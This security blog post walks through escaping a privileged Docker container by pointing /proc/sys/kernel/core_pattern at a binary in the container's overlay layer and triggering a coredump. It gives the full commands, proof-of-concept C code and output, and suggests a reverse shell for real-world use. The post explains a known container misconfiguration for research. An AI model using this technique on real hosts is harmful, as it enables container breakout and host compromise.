Escaping privileged containers for fun

Despite the fact that it is not a ‘real’ vulnerability, escaping privileged Docker containers is nevertheless pretty funny. And because there will always be people who will come up with reasons or excuses to run a privileged container (even though you really shouldn’t), this could really be handy at some point in the future.

As a result of the recent discovery of the cgroup_release_agent escape trick (CVE-2022-0492), I went on a search for calls to the call_usermodehelper_* family and attempted to determine which ones may be easily accessed within a container environment.

It is necessary to understand what call_usermodehelper is before we can take a look at the results. What call_usermodehelper essentially does is run a program in usermode, which is a convenient feature for security researchers ;).

After a short grep, I discovered that the kernel’s coredump handling code included a call to this particular function. You may see a sample of the code in the section below.

for (argi = 0; argi < argc; argi++)
        helper_argv[argi] = cn.corename + argv[argi];
helper_argv[argi] = NULL;

retval = -ENOMEM;
sub_info = call_usermodehelper_setup(helper_argv[0],
                                helper_argv, NULL, GFP_KERNEL,
                                umh_pipe_setup, NULL, &cprm);
if (sub_info)
        retval = call_usermodehelper_exec(sub_info,
                                          UMH_WAIT_EXEC);

kfree(helper_argv);

Then it occurred to me that this would be a good target to shoot at after all. Even more so because there is nothing that would prevent us from performing a coredump in a container, right? (In addition, technologies such as apport/systemd-coredump are interesting targets to investigate at some point in the future)

The only thing left to do is try to figure out how this code got accessed in the first place. Fortunately, a quick man 5 core revealed exactly how this works!

From the manuals: Since kernel 2.6.19, Linux supports an alternate syntax for the /proc/sys/kernel/core_pattern file. If the first character of this file is a pipe symbol (|), then the remainder of the line is interpreted as the command-line for a user-space program (or script) that is to be executed.

For the most part, what this implies is that if we can successfully write our “evil” program to /proc/sys/kernel/core_pattern prefixed with a pipe, the kernel will execute our program outside of our container.

One of the prerequisites for this is that our binary is reachable on the host operating system. Fortunately, the folders that OverlayFS (Docker’s filesystem) is mounting are also reachable on the host operating system. By performing the mount command in the container, we can determine the location of the filesystem. Let’s take a look at the results.

root@80f74c2d80e5:/# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/VNLJAHVXND5S423TW3TWVSKI7G:/var/lib/docker/overlay2/l/HMQWWMKA2U45KTCTUVDFHWCHQ2,upperdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff,workdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (rw,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/md2 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/md2 on /etc/hostname type ext4 (rw,relatime)
/dev/md2 on /etc/hosts type ext4 (rw,relatime)
devpts on /dev/console type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)

If you take a look at the first line, you’ll see that the ‘diff’ layer is /var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff This is actually the location of this directory on the host.

This may be verified by writing something to a file on the container with an extraordinarily precise name such that we can use the find command on the host to locate the file on the container:

# make the file in the container
root@80f74c2d80e5:/# echo "hi host" > bladiebladiebla.txt

# find the file on the host
$ find / -name "bladiebladiebla.txt"
/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/bladiebladiebla.txt
/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/merged/bladiebladiebla.txt

# check out it's contents on the host
$ cat /var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/bladiebladiebla.txt
hi host

Now, my original plan was to create a binary in the container, and we’ve already figured out where it’s going to be placed on the host machine in question. Afterwards, we’ll need to make it the command in /proc/sys/kernel/core_pattern, and then trigger it by generating a coredump!

Let’s test this by creating a very minimal C program that will write something to /tmp/hacked.

#include <stdio.h>

int main(void)
{
    FILE *fp;
    fp = fopen("/tmp/hacked", "w");
    fprintf(fp, "Hello from the container!\n");
    fclose(fp);
    return 0;
}

Let’s write this file to the system and test it to see if it performs as expected.

# write poc to system
root@80f74c2d80e5:/# vim poc.c
# compile it
root@80f74c2d80e5:/# gcc -o poc poc.c
# figure out the location from the diff variable
root@80f74c2d80e5:/# mount | head -n 1
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/VNLJAHVXND5S423TW3TWVSKI7G:/var/lib/docker/overlay2/l/HMQWWMKA2U45KTCTUVDFHWCHQ2,upperdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff,workdir=/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/work)
# actually set the program to be executed on coredumps to our program on the host 
root@80f74c2d80e5:/# echo "|/var/lib/docker/overlay2/c6c17d65527df160607559e9700ac930b50fe3271402c0adf30a9d96cef21680/diff/poc" > /proc/sys/kernel/core_pattern

The only thing left to do is to trigger a coredump! There are a variety of approaches you may take, but I usually just write some plainly broken C (let’s pretend that’s what I’m intending to do).

// pretty sure this crashes :)
int main(void) {
	char buf[1];
	for (int i = 0; i < 100; i++) {
		buf[i] = 1;
	}
	return 0;
}

Let’s write it to the system, compile it and trigger it!

# write the file to the system
root@80f74c2d80e5:/# vim crash.c
# compile the binary
root@80f74c2d80e5:/# gcc -o crash crash.c
# crash all the things!
root@80f74c2d80e5:/# ./crash
*** stack smashing detected ***: terminated
Aborted (core dumped)

Now if we take a look at the /tmp/hacked file on the host, you’ll see that it got our content!

$ cat /tmp/hacked
Hello from the container!

Now, in a real-world scenario, you’d probably want to start a reverse shell or something similar instead of simply writing to /tmp/hacked. This was just an example to explain the concept. Keep in mind that privileged containers should NOT be run.

Cheers!